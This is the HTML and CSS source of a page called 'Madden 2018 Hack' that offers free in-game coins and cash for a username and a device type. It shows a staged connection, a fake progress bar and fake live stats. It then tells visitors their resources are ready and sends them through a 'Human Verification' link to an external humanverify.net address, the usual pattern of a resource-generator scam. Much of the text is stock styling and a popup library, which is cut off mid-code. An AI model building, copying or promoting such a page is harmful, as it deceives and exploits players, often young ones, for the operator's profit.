<!DOCTYPE html>
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1">
		<title>Madden 2018 Hack</title>

		<!-- Bootstrap CSS -->
		<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
		<link href="https://fonts.googleapis.com/css?family=Oswald" rel="stylesheet">
		
		
		
		<style>
			/* Magnific Popup CSS */
.mfp-bg {
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: 1042;
  overflow: hidden;
  position: fixed;
  background: #0b0b0b;
  opacity: 0.8;
  filter: alpha(opacity=80); }

.mfp-wrap {
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: 1043;
  position: fixed;
  outline: none !important;
  -webkit-backface-visibility: hidden; }

.mfp-container {
  text-align: center;
  position: absolute;
  width: 100%;
  height: 100%;
  left: 0;
  top: 0;
  padding: 0 8px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box; }

.mfp-container:before {
  content: '';
  display: inline-block;
  height: 100%;
  vertical-align: middle; }

.mfp-align-top .mfp-container:before {
  display: none; }

.mfp-content {
  position: relative;
  display: inline-block;
  vertical-align: middle;
  margin: 0 auto;
  text-align: left;
  z-index: 1045; }

.mfp-inline-holder .mfp-content, .mfp-ajax-holder .mfp-content {
  width: 100%;
  cursor: auto; }

.mfp-ajax-cur {
  cursor: progress; }

.mfp-zoom-out-cur, .mfp-zoom-out-cur .mfp-image-holder .mfp-close {
  cursor: -moz-zoom-out;
  cursor: -webkit-zoom-out;
  cursor: zoom-out; }

.mfp-zoom {
  cursor: pointer;
  cursor: -webkit-zoom-in;
  cursor: -moz-zoom-in;
  cursor: zoom-in; }

.mfp-auto-cursor .mfp-content {
  cursor: auto; }

.mfp-close, .mfp-arrow, .mfp-preloader, .mfp-counter {
  -webkit-user-select: none;
  -moz-user-select: none;
  user-select: none; }

.mfp-loading.mfp-figure {
  display: none; }

.mfp-hide {
  display: none !important; }

.mfp-preloader {
  color: #CCC;
  position: absolute;
  top: 50%;
  width: auto;
  text-align: center;
  margin-top: -0.8em;
  left: 8px;
  right: 8px;
  z-index: 1044; }
  .mfp-preloader a {
    color: #CCC; }
    .mfp-preloader a:hover {
      color: #FFF; }

.mfp-s-ready .mfp-preloader {
  display: none; }

.mfp-s-error .mfp-content {
  display: none; }

button.mfp-close, button.mfp-arrow {
  overflow: visible;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
  display: block;
  outline: none;
  padding: 0;
  z-index: 1046;
  -webkit-box-shadow: none;
  box-shadow: none; }
button::-moz-focus-inner {
  padding: 0;
  border: 0; }

.mfp-close {
  width: 44px;
  height: 44px;
  line-height: 44px;
  position: absolute;
  right: 0;
  top: 0;
  text-decoration: none;
  text-align: center;
  opacity: 0.65;
  filter: alpha(opacity=65);
  padding: 0 0 18px 10px;
  color: #FFF;
  font-style: normal;
  font-size: 28px;
  font-family: Arial, Baskerville, monospace; }
  .mfp-close:hover, .mfp-close:focus {
    opacity: 1;
    filter: alpha(opacity=100); }
  .mfp-close:active {
    top: 1px; }

.mfp-close-btn-in .mfp-close {
  color: #333; }

.mfp-image-holder .mfp-close, .mfp-iframe-holder .mfp-close {
  color: #FFF;
  right: -6px;
  text-align: right;
  padding-right: 6px;
  width: 100%; }

.mfp-counter {
  position: absolute;
  top: 0;
  right: 0;
  color: #CCC;
  font-size: 12px;
  line-height: 18px;
  white-space: nowrap; }

.mfp-arrow {
  position: absolute;
  opacity: 0.65;
  filter: alpha(opacity=65);
  margin: 0;
  top: 50%;
  margin-top: -55px;
  padding: 0;
  width: 90px;
  height: 110px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0); }
  .mfp-arrow:active {
    margin-top: -54px; }
  .mfp-arrow:hover, .mfp-arrow:focus {
    opacity: 1;
    filter: alpha(opacity=100); }
  .mfp-arrow:before, .mfp-arrow:after, .mfp-arrow .mfp-b, .mfp-arrow .mfp-a {
    content: '';
    display: block;
    width: 0;
    height: 0;
    position: absolute;
    left: 0;
    top: 0;
    margin-top: 35px;
    margin-left: 35px;
    border: medium inset transparent; }
  .mfp-arrow:after, .mfp-arrow .mfp-a {
    border-top-width: 13px;
    border-bottom-width: 13px;
    top: 8px; }
  .mfp-arrow:before, .mfp-arrow .mfp-b {
    border-top-width: 21px;
    border-bottom-width: 21px;
    opacity: 0.7; }

.mfp-arrow-left {
  left: 0; }
  .mfp-arrow-left:after, .mfp-arrow-left .mfp-a {
    border-right: 17px solid #FFF;
    margin-left: 31px; }
  .mfp-arrow-left:before, .mfp-arrow-left .mfp-b {
    margin-left: 25px;
    border-right: 27px solid #3F3F3F; }

.mfp-arrow-right {
  right: 0; }
  .mfp-arrow-right:after, .mfp-arrow-right .mfp-a {
    border-left: 17px solid #FFF;
    margin-left: 39px; }
  .mfp-arrow-right:before, .mfp-arrow-right .mfp-b {
    border-left: 27px solid #3F3F3F; }

.mfp-iframe-holder {
  padding-top: 40px;
  padding-bottom: 40px; }
  .mfp-iframe-holder .mfp-content {
    line-height: 0;
    width: 100%;
    max-width: 900px; }
  .mfp-iframe-holder .mfp-close {
    top: -40px; }

.mfp-iframe-scaler {
  width: 100%;
  height: 0;
  overflow: hidden;
  padding-top: 56.25%; }
  .mfp-iframe-scaler iframe {
    position: absolute;
    display: block;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    box-shadow: 0 0 8px rgba(0, 0, 0, 0.6);
    background: #000; }

/* Main image in popup */
img.mfp-img {
  width: auto;
  max-width: 100%;
  height: auto;
  display: block;
  line-height: 0;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
  padding: 40px 0 40px;
  margin: 0 auto; }

/* The shadow behind the image */
.mfp-figure {
  line-height: 0; }
  .mfp-figure:after {
    content: '';
    position: absolute;
    left: 0;
    top: 40px;
    bottom: 40px;
    display: block;
    right: 0;
    width: auto;
    height: auto;
    z-index: -1;
    box-shadow: 0 0 8px rgba(0, 0, 0, 0.6);
    background: #444; }
  .mfp-figure small {
    color: #BDBDBD;
    display: block;
    font-size: 12px;
    line-height: 14px; }
  .mfp-figure figure {
    margin: 0; }

.mfp-bottom-bar {
  margin-top: -36px;
  position: absolute;
  top: 100%;
  left: 0;
  width: 100%;
  cursor: auto; }

.mfp-title {
  text-align: left;
  line-height: 18px;
  color: #F3F3F3;
  word-wrap: break-word;
  padding-right: 36px; }

.mfp-image-holder .mfp-content {
  max-width: 100%; }

.mfp-gallery .mfp-image-holder .mfp-figure {
  cursor: pointer; }

@media screen and (max-width: 800px) and (orientation: landscape), screen and (max-height: 300px) {
  /**
       * Remove all paddings around the image on small screen
       */
  .mfp-img-mobile .mfp-image-holder {
    padding-left: 0;
    padding-right: 0; }
  .mfp-img-mobile img.mfp-img {
    padding: 0; }
  .mfp-img-mobile .mfp-figure:after {
    top: 0;
    bottom: 0; }
  .mfp-img-mobile .mfp-figure small {
    display: inline;
    margin-left: 5px; }
  .mfp-img-mobile .mfp-bottom-bar {
    background: rgba(0, 0, 0, 0.6);
    bottom: 0;
    margin: 0;
    top: auto;
    padding: 3px 5px;
    position: fixed;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box; }
    .mfp-img-mobile .mfp-bottom-bar:empty {
      padding: 0; }
  .mfp-img-mobile .mfp-counter {
    right: 5px;
    top: 3px; }
  .mfp-img-mobile .mfp-close {
    top: 0;
    right: 0;
    width: 35px;
    height: 35px;
    line-height: 35px;
    background: rgba(0, 0, 0, 0.6);
    position: fixed;
    text-align: center;
    padding: 0; }
 }

@media all and (max-width: 900px) {
  .mfp-arrow {
    -webkit-transform: scale(0.75);
    transform: scale(0.75); }

  .mfp-arrow-left {
    -webkit-transform-origin: 0;
    transform-origin: 0; }

  .mfp-arrow-right {
    -webkit-transform-origin: 100%;
    transform-origin: 100%; }

  .mfp-container {
    padding-left: 6px;
    padding-right: 6px; }
 }

.mfp-ie7 .mfp-img {
  padding: 0; }
.mfp-ie7 .mfp-bottom-bar {
  width: 600px;
  left: 50%;
  margin-left: -300px;
  margin-top: 5px;
  padding-bottom: 5px; }
.mfp-ie7 .mfp-container {
  padding: 0; }
.mfp-ie7 .mfp-content {
  padding-top: 44px; }
.mfp-ie7 .mfp-close {
  top: 0;
  right: 0;
  padding-top: 0; }

.white-popup-block {
    background:#FFFFFF;
    text-align:left;
    max-width:650px;
    position:relative;
    margin:40px auto;
    padding:20px 30px;
}

</style>


		
		<style>
			
html {
	height: 100%;
	overflow: auto;
}

body {
	background-image: url(https://ogcdn.co/freemaddengiveaway.com/img/bg.jpg);
	background-position: center center;
	background-size: cover;
	background-repeat: no-repeat;
	height: 100%;
	width: 100%;
	font-family: 'Oswald', sans-serif;
	-webkit-transition: all .25s ease-in;
	   -moz-transition: all .25s ease-in;
	    -ms-transition: all .25s ease-in;
	     -o-transition: all .25s ease-in;
	        transition: all .25s ease-in;
	        overflow: auto;

}


a:hover {
	text-decoration: none;
}

a:focus {
	color: #fff;
	text-decoration: none;
}

* {
  -webkit-transition: all .25s ease-in;
	   -moz-transition: all .25s ease-in;
	    -ms-transition: all .25s ease-in;
	     -o-transition: all .25s ease-in;
	        transition: all .25s ease-in;
}

.pagelayer {
	height: 100%;
	background-color: rgba(51, 51, 51, 0.42);

}



.madden-wrap {
	float: none;
	max-width: 420px;
	width: 100%;
	top: 15%;
	min-height:622px;
	background-color: rgba(0, 0, 0, 0.85);
	border-radius: 5px;
	color: #d3d3d3;
	padding-left: 0px;
	padding-right: 0px;

}

.madden-header {
	background-image: radial-gradient(ellipse closest-corner at center, #212121 0%, #010101 100%);
	border-bottom: 2px solid rgba(51, 51, 51, 0.35);
	border-top-right-radius: 5px;
	border-top-left-radius: 5px;
}


.madden-header h1 {
	margin-top: 0px;
	padding-top: 20px;
	padding-bottom: 20px;
	margin-bottom: 0px;
	font-size: 23px;
    position: relative;
    text-transform: uppercase;
}



.madden-header h1:before {
	content: '';
    position: absolute;
    top: 8px;
    left: 33px;
    background: url(https://ogcdn.co/freemaddengiveaway.com/img/logo.jpg);
    width: 48px;
    height: 68px;
    background-size: 100%;
    background-repeat: no-repeat;
}


.username-text {
	text-transform: uppercase;
	margin-top: 40px;
	background-image: radial-gradient(ellipse closest-corner at center, #212121 0%, #010101 100%);
	border-bottom: 2px solid rgba(51, 51, 51, 0.35);

}


.username-text h4 {
	font-size: 16px;
	margin-top: 0px;
	margin-bottom: 0px;
	padding-top: 10px;
	padding-bottom: 10px;
	letter-spacing: .6px;
}


.username-device-wrap {
	overflow: auto;
	padding-top: 10px;
	padding-bottom: 10px;
	background-image: linear-gradient(to bottom, #35373B 0%, #052E59 100%);
	border-bottom: 1px #286090 solid;
	font-size: 18px;
	letter-spacing: .6px;
	color: #fff;
	-webkit-transition: all .25s ease-in;
	   -moz-transition: all .25s ease-in;
	    -ms-transition: all .25s ease-in;
	     -o-transition: all .25s ease-in;
	        transition: all .25s ease-in;
}


.username-device-wrap label {
	font-weight: 100;
}


.username-device-wrap input {
	width: 100%;
	background-color: transparent;
	border:solid 1px #999999;
	color: #999999;
	padding-left: 5px;
	outline: 0;
	border-radius: 4px;
}


.username-device-wrap select {
	width: 100%;
	background-color: transparent;
	color: #999999;
	outline: 0;
	border-radius: 4px;
}


.username-device-wrap img {
	height: 30px;
	margin-right: 5px;
}


.connect-button {
	text-transform: uppercase;
	margin-top: 0px;
	padding-top: 15px;
	padding-bottom: 10px;
	background-image: radial-gradient(ellipse closest-corner at center, #212121 0%, #010101 100%);
	border-bottom: 2px solid rgba(51, 51, 51, 0.35);
}


.connect-btn {
	display: inline-block;
	padding: 7px 10px 7px 10px;
	border-radius: 4px;
	background-image: linear-gradient(to bottom, #7D0400 0%, #250000 50%, #7D0400 100%);
	border:2px solid #7a0e12;
	color: #fff;
	letter-spacing: 0.6px;
}





.resources-title {
	text-transform: uppercase;
	margin-top: 40px;
	background-image: radial-gradient(ellipse closest-corner at center, #212121 0%, #010101 100%);
	border-bottom: 2px solid rgba(51, 51, 51, 0.35);
}


.resources-title h4 {
	font-size: 16px;
	margin-top: 0px;
	margin-bottom: 0px;
	padding-top: 10px;
	padding-bottom: 10px;
	letter-spacing: .6px;
	text-align: center;
	color: #d3d3d3;
}


.selected-amount-wrapper {
    background-color: transparent;

    padding: 4px 0px 4px 0px;
    font-size: 20px;
     border:solid #d3d3d3 2px;
    padding-right: 25px;
    text-align:center;
    -webkit-border-radius: 2px;
    -moz-border-radius: 2px;
    border-radius: 2px;
   position: relative;
    color: #d3d3d3;
    cursor: default;
    margin-top: 10px;
}

.single-resource-wrapper {
	margin-bottom: 15px;
	padding-right: 10px;
	padding-left:10px;
}


.value-button-wrapper {
	position: relative;
	-webkit-transition: all 0.2s ease-in-out 0s;
	-moz-transition: all 0.2s ease-in-out 0s;
	-ms-transition: all 0.2s ease-in-out 0s;
	-o-transition: all 0.2s ease-in-out 0s;
	transition: all 0.2s ease-in-out 0s;
}




.value-button.btn-disabled {
	border: 2px solid transparent;	
}
.value-button::selection {
  background: none;
}
.value-button::-moz-selection {
  background: none;
}
.value-button:active {
	transform:scale(0.9,0.9);
}
.value-button.btn-disabled:active {
	transform:scale(1,1);
}

.decrease-button.btn-disabled {
	color: #666;
	
	cursor: not-allowed;
}
.increase-button.btn-disabled {
	color:#666;
	opacity: .5;
	cursor: not-allowed;
}
.panel-title {
	margin-bottom: 15px;
}
.panel-title h2 {
	margin: 0;
}







.resource-img {
    max-width: 52px;
    position: absolute;
    right: -19px;
    top: -6px;
}


.cash-img {
	max-width: 63px;
	right: -22px;
}

.max-amount {
	display: none;
	content: 'MAX';
	color: #24272d;
	right: 15px;
	top: 2px;
	position: absolute;
}
.max-amount::selection {
  background: none;
}
.max-amount::-moz-selection {
  background: none;
}


.maddencoins-amount, 
.maddencash-amount, .cocgem-amount {
	color: #fff;
	font-weight: 600;
	text-shadow: 0 1px 0 #111, -1px 3px 0 #111, 1px -1px 0 #111, -1px 1px 0 #111, 1px 1px 0 #111;
}







.control-increase {
    position: absolute;
    left: -11px;
    top: -35px;
    width: 37px;
}


#increase-cocgem {
	left: -18px; 
}


.control-increase img {
	height: 51px;
    top: -10px;
    left: -10px;
    position: relative;
}

.control-decrease {
	position: absolute;
	top: -2px;
	right: -19px;
	width: 37px;
	line-height: 32px;
}


.resources-select-wrapper {
	margin-top: 30px;
}


.cash-wraper {
	background-color: transparent;
    padding: 4px 0px 4px 0px;
    font-size: 20px;
     border:solid #d3d3d3 2px;
    padding-right: 25px;
    text-align:center;
    -webkit-border-radius: 2px;
    -moz-border-radius: 2px;
    border-radius: 2px;
   position: relative;
    color: #d3d3d3;
    cursor: default;
    margin-top: 10px;
}




.maddencash-select-wrapper, .cocgem-select-wrapper {
	margin-top: 10px;
}

.cocgem-select-wrapper {
	width: 77%;
	float: right;
}


.coins, .cash {
	float: none;
	width: 70%;
}



.hack-btn {
	display: inline-block;
	padding: 10px 15px 10px 15px;
	border-radius: 4px;
	background-image: linear-gradient(to bottom, #7D0400 0%, #250000 50%, #7D0400 100%);
    border: 2px solid #7a0e12;
	color: #fff;
	font-size: 18px;
	letter-spacing: 0.6px;
	text-transform: uppercase;
	text-align: center;
}

.hack-btn:hover {
	color: #fff;
}


.spinner {
  margin: 5px auto;
  width: 50px;
  height: 40px;
  text-align: center;
  font-size: 10px;
}

.spinner > div {
  background-color: #fff;
  height: 100%;
  width: 6px;
  display: inline-block;
  
  -webkit-animation: sk-stretchdelay 1.2s infinite ease-in-out;
  animation: sk-stretchdelay 1.2s infinite ease-in-out;
}

.spinner .rect2 {
  -webkit-animation-delay: -1.1s;
  animation-delay: -1.1s;
}

.spinner .rect3 {
  -webkit-animation-delay: -1.0s;
  animation-delay: -1.0s;
}

.spinner .rect4 {
  -webkit-animation-delay: -0.9s;
  animation-delay: -0.9s;
}

.spinner .rect5 {
  -webkit-animation-delay: -0.8s;
  animation-delay: -0.8s;
}

@-webkit-keyframes sk-stretchdelay {
  0%, 40%, 100% { -webkit-transform: scaleY(0.4) }  
  20% { -webkit-transform: scaleY(1.0) }
}

@keyframes sk-stretchdelay {
  0%, 40%, 100% { 
    transform: scaleY(0.4);
    -webkit-transform: scaleY(0.4);
  }  20% { 
    transform: scaleY(1.0);
    -webkit-transform: scaleY(1.0);
  }
}


.pre-connect p {

}	


.con {
	color: #4fdd00;
}


.connected-btn {
	display: inline-block;
	padding: 7px 10px 7px 10px;
	border-radius: 4px;
	color: #fff!important;
	background-color: #4fdd00!important;
	
	border:2px solid #4fdd00!important;
	letter-spacing: 0.6px!important;
	background-image: linear-gradient(to bottom, #004B02 0%, #001300 50%, #004B02 100%);
}


.connected-btn:hover {
	color:#232323;
}


#select-text2 , #user-text {
	color: #1b7cc6;
	padding-left: 5px;
	padding-right: 5px;

}


.progress-bar {
	background-image: linear-gradient(to bottom, #35373B 0%, #052E59 100%);
    
}

.progress {
	height: 15px;
}


.verifi {
	display: inline-block;
	padding: 7px 10px 7px 10px;
	border-radius: 4px;
	background-color: #4fdd00!important;
	color: #fff!important;
	letter-spacing: 0.6px!important;
	background-image: linear-gradient(to bottom, #7D0400 0%, #250000 50%, #7D0400 100%);
    border: 2px solid #7a0e12;
}


.hack-verification {
	font-size: 17px;
	letter-spacing: 0.6px;
}


#user-text2, #user-text3 {
	color: #1b7cc6;
	padding-right: 5px;
	padding-left: 5px;
}


.popup-style {
	max-width: 367px!important;
	background-color: #000!important;
	color: #fff!important;
	letter-spacing: 0.6px;
}


.intro-list {
	padding-left: 0px;
	margin-bottom: 0px;
	text-align: center;
	padding-top: 20px;
}

.intro-list li {
	display: inline-block;
	margin-right: 5px;
	margin-left: 5px;
}


#online {
	color: green;
}


.serverstat {
	color: green;
}

#ip {
	color: #1b7cc6;
}


.intro-list li span {
	padding-left: 3px;
}

@media only screen and (max-width : 420px) {
	.fadeout-input {
		padding-left: 25px;
		padding-right: 25px;

	}

	.fadeout-input input {
		margin-bottom: 10px;
	}

	.madden-wrap {
		top: 10%;
	}

	.hack-btn {
		margin-bottom: 20px;
	}


	.madden-header h1:before {
		left: 16px;
	}
}

</style>



		<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
		<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
		<!--[if lt IE 9]>
			<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.2/html5shiv.min.js"></script>
			<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
		<![endif]-->
	</head>
	<body>


		<div class="pagelayer">
			<div class="madden-wrap col-lg-12 center-block">
				<div class="madden-header text-center">
					<h1>Madden 2018 Hack</h1>
				</div>

				<ul class="intro-list">
					<li>Your IP:<span id="ip"></span></li>
					<li>Server Status: <span class="serverstat">Online</span></li>
					<li>Online Users: <span id="online"></span></li>
				</ul>

				<div class="madden-content">
					
					<div class="username-text text-center">
						<h4>Username and Device</h4>
					</div>
					<div class="username-device-wrap text-center">
						<div class="fadeout-input" >
							<div class="col-sm-6">
								<label><img src="https://ogcdn.co/freemaddengiveaway.com/img/username.png"> Username</label>
								<input type="text" name="username" id="username">
							</div>
							<div class="col-sm-6">
								<label><img src="https://ogcdn.co/freemaddengiveaway.com/img/device.png">Device</label>
								<select id="deviceselect">
									<option value="Android">Android</option>
									<option value="IOS">IOS</option>
									<option value="PS3">PS3</option>
									<option value="PS4">PS4</option>
									<option value="PS4 Pro">PS4 Pro</option>
									<option value="Xbox 360">Xbox 360</option>
									<option value="Xbox one">Xbox One</option>
									<option value="Xbox One S">Xbox One S</option>
									<option value="PC">PC</option>
									<option value="MAC">MAC</option>
								</select>
							

							</div>
						</div>

						<div class="pre-connect" style="display: none;">

							<div class="spinner">
							  <div class="rect1"></div>
							  <div class="rect2"></div>
							  <div class="rect3"></div>
							  <div class="rect4"></div>
							  <div class="rect5"></div>
							</div>

							<p>Connecting...</p>
							
						</div>
						
						<div class="username connecting" style="display: none;">
							<p>Username<span id="user-text"></span> ( Device:<span id="select-text2"></span>) <span class="con">Connected</span></p> 
						</div>
					</div>

					<div class="connect-button text-center">
							<a href="#" class="connect-btn" id="connect" style="color: #fff;">connected</a>
							

					</div>

					<div class="resources">

						<div class="resources-title">
							<h4>Select resources</h4>
						</div>

						<div class="col-lg-12 center-block coins">
							<div class="single-resource-wrapper">
									<div class="maddencoins-select-wrapper">
									
										<div class=" responsive-value-wrapper">
											
											<div id="maddencoins-amount-wrapper" class="selected-amount-wrapper">
												<img class="resource-img" src="https://ogcdn.co/freemaddengiveaway.com/img/coins.png" />
												<div id="maddencoins-amount" class="maddencoins-amount">0</div>
												
											</div>	
											
										</div>
										
										<div class=" no-padding-left responsive-button-wrapper">
											<div class="value-button-wrapper">	
												<div id="increase-maddencoins" class="increase-button value-button control-increase"><img src="https://ogcdn.co/freemaddengiveaway.com/img/add-btn.png"></div>
											</div>	
										</div>	
									</div>				
							</div>
						</div>

						<div class="col-lg-12 center-block cash">
							<div class="single-resource-wrapper">
								<div class="maddencash-select-wrapper">
									
									<div class=" responsive-value-wrapper">
										
										<div id="maddencash-amount-wrapper" class="cash-wraper ">
											<img class="resource-img cash-img" src="https://ogcdn.co/freemaddengiveaway.com/img/cash.png" />
											<div id="maddencash-amount" class="maddencash-amount">0</div> 
											
										</div>
										
										
									</div>
									<div class=" no-padding-left responsive-button-wrapper">	
										<div class="value-button-wrapper">	
											<div id="increase-maddencash" class="increase-button value-button control-increase"><img src="https://ogcdn.co/freemaddengiveaway.com/img/add-btn.png"></div>
										</div>
									</div>	
								</div>				
							</div>
						</div>

						<div class="col-lg-12 text-center">
							<a href="#" class="hack-btn">Hack Now</a>
						</div>

					</div>


					<div class="hack-start" style="display: none;">
						<div class="resources-title">
							<h4>Please wait...</h4>
						</div>


						<div class="madden-progress center-block" style="width: 70%; text-align: center; position: relative;">

								

								<h3 style="margin-bottom: 3px;">Checking username<span id="user-text2"></span></h3>
								<p  id="madden-progress-text">Tool Modify your account</p>
								<div class="progress" style="margin-bottom: 7px;">
						            <div class="progress-bar  active g-progressbar" role="progressbar" style="width: 20%"></div>
						            
						        </div>
						         <div class="description">
							         <p>Loading...</p>
								 </div>
							</div>
					</div>


					<div class="hack-verification text-center" style="display: none;">
						<div class="resources-title">
							<h4>Human Verification</h4>
						</div>

						
						<p style="font-weight: 600; font-size: 18px; margin-top: 20px;">Hi <span id="user-text3"></span>, your resources  are available</p>
						<p>Due to an unusual amount of bot requests, users are now required to complete a brief human verification process.</p>
						<a href="https://humanverify.net/cl.php?id=e509ac87fd80c4b7d1a33b272b7e9aa6" class="verifi">Verify</a>


					</div>
					
				</div>
			</div>
		</div>

		<div id="madden-connect-err" class="mfp-hide white-popup-block text-center popup-style">
			<h4 class="text-center error-popup">Error!</h4>
			<p class="mfp-close">x</p>
			
			<div class="popup-content text-center">
				<p>Please enter your username and click on "connect" Button</p>
				
				
			</div>
		</div>

		<!-- jQuery -->
		<script src="http://code.jquery.com/jquery.js"></script>
		<!-- Bootstrap JavaScript -->
		<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
		<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js" type="text/javascript"></script>
		
		
		
		<script type="text/javascript">
			/*! Magnific Popup - v1.0.0 - 2015-01-03
* http://dimsemenov.com/plugins/magnific-popup/
* Copyright (c) 2015 Dmitry Semenov; */
!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=c),b.currTemplate.closeBtn},A=function(){a.magnificPopup.instance||(b=new t,b.init(),a.magnificPopup.instance=b)},B=function(){var a=document.createElement("p").style,b=["ms","O","Moz","Webkit"];if(void 0!==a.transition)return!0;for(;b.length;)if(b.pop()+"Transition"in a)return!0;return!1};t.prototype={constructor:t,init:function(){var c=navigator.appVersion;b.isIE7=-1!==c.indexOf("MSIE 7."),b.isIE8=-1!==c.indexOf("MSIE 8."),b.isLowIE=b.isIE7||b.isIE8,b.isAndroid=/android/gi.test(c),b.isIOS=/iphone|ipad|ipod/gi.test(c),b.supportsTransition=B(),b.probablyMobile=b.isAndroid||b.isIOS||/(Opera Mini)|Kindle|webOS|BlackBerry|(Opera Mobi)|(Windows Phone)|IEMobile/i.test(navigator.userAgent),d=a(document),b.popupsCache={}},open:function(c){var e;if(c.isObj===!1){b.items=c.items.toArray(),b.index=0;var g,h=c.items;for(e=0;e<h.length;e++)if(g=h[e],g.parsed&&(g=g.el[0]),g===c.el[0]){b.index=e;break}}else b.items=a.isArray(c.items)?c.items:[c.items],b.index=c.index||0;if(b.isOpen)return void b.updateItemHTML();b.types=[],f="",b.ev=c.mainEl&&c.mainEl.length?c.mainEl.eq(0):d,c.key?(b.popupsCache[c.key]||(b.popupsCache[c.key]={}),b.currTemplate=b.popupsCache[c.key]):b.currTemplate={},b.st=a.extend(!0,{},a.magnificPopup.defaults,c),b.fixedContentPos="auto"===b.st.fixedContentPos?!b.probablyMobile:b.st.fixedContentPos,b.st.modal&&(b.st.closeOnContentClick=!1,b.st.closeOnBgClick=!1,b.st.showCloseBtn=!1,b.st.enableEscapeKey=!1),b.bgOverlay||(b.bgOverlay=x("bg").on("click"+p,function(){b.close()}),b.wrap=x("wrap").attr("tabindex",-1).on("click"+p,function(a){b._checkIfClose(a.target)&&b.close()}),b.container=x("container",b.wrap)),b.contentContainer=x("content"),b.st.preloader&&(b.preloader=x("preloader",b.container,b.st.tLoading));var i=a.magnificPopup.modules;for(e=0;e<i.length;e++){var j=i[e];j=j.charAt(0).toUpperCase()+j.slice(1),b["init"+j].call(b)}y("BeforeOpen"),b.st.showCloseBtn&&(b.st.closeBtnInside?(w(l,function(a,b,c,d){c.close_replaceWith=z(d.type)}),f+=" mfp-close-btn-in"):b.wrap.append(z())),b.st.alignTop&&(f+=" mfp-align-top"),b.wrap.css(b.fixedContentPos?{overflow:b.st.overflowY,overflowX:"hidden",overflowY:b.st.overflowY}:{top:v.scrollTop(),position:"absolute"}),(b.st.fixedBgPos===!1||"auto"===b.st.fixedBgPos&&!b.fixedContentPos)&&b.bgOverlay.css({height:d.height(),position:"absolute"}),b.st.enableEscapeKey&&d.on("keyup"+p,function(a){27===a.keyCode&&b.close()}),v.on("resize"+p,function(){b.updateSize()}),b.st.closeOnContentClick||(f+=" mfp-auto-cursor"),f&&b.wrap.addClass(f);var k=b.wH=v.height(),n={};if(b.fixedContentPos&&b._hasScrollBar(k)){var o=b._getScrollbarSize();o&&(n.marginRight=o)}b.fixedContentPos&&(b.isIE7?a("body, html").css("overflow","hidden"):n.overflow="hidden");var r=b.st.mainClass;return b.isIE7&&(r+=" mfp-ie7"),r&&b._addClassToMFP(r),b.updateItemHTML(),y("BuildControls"),a("html").css(n),b.bgOverlay.add(b.wrap).prependTo(b.st.prependTo||a(document.body)),b._lastFocusedEl=document.activeElement,setTimeout(function(){b.content?(b._addClassToMFP(q),b._setFocus()):b.bgOverlay.addClass(q),d.on("focusin"+p,b._onFocusIn)},16),b.isOpen=!0,b.updateSize(k),y(m),c},close:function(){b.isOpen&&(y(i),b.isOpen=!1,b.st.removalDelay&&!b.isLowIE&&b.supportsTransition?(b._addClassToMFP(r),setTimeout(function(){b._close()},b.st.removalDelay)):b._close())},_close:function(){y(h);var c=r+" "+q+" ";if(b.bgOverlay.detach(),b.wrap.detach(),b.container.empty(),b.st.mainClass&&(c+=b.st.mainClass+" "),b._removeClassFromMFP(c),b.fixedContentPos){var e={marginRight:""};b.isIE7?a("body, html").css("overflow",""):e.overflow="",a("html").css(e)}d.off("keyup"+p+" focusin"+p),b.ev.off(p),b.wrap.attr("class","mfp-wrap").removeAttr("style"),b.bgOverlay.attr("class","mfp-bg"),b.container.attr("class","mfp-container"),!b.st.showCloseBtn||b.st.closeBtnInside&&b.currTemplate[b.currItem.type]!==!0||b.currTemplate.closeBtn&&b.currTemplate.closeBtn.detach(),b._lastFocusedEl&&a(b._lastFocusedEl).focus(),b.currItem=null,b.content=null,b.currTemplate=null,b.prevHeight=0,y(j)},updateSize:function(a){if(b.isIOS){var c=document.documentElement.clientWidth/window.innerWidth,d=window.innerHeight*c;b.wrap.css("height",d),b.wH=d}else b.wH=a||v.height();b.fixedContentPos||b.wrap.css("height",b.wH),y("Resize")},updateItemHTML:function(){var 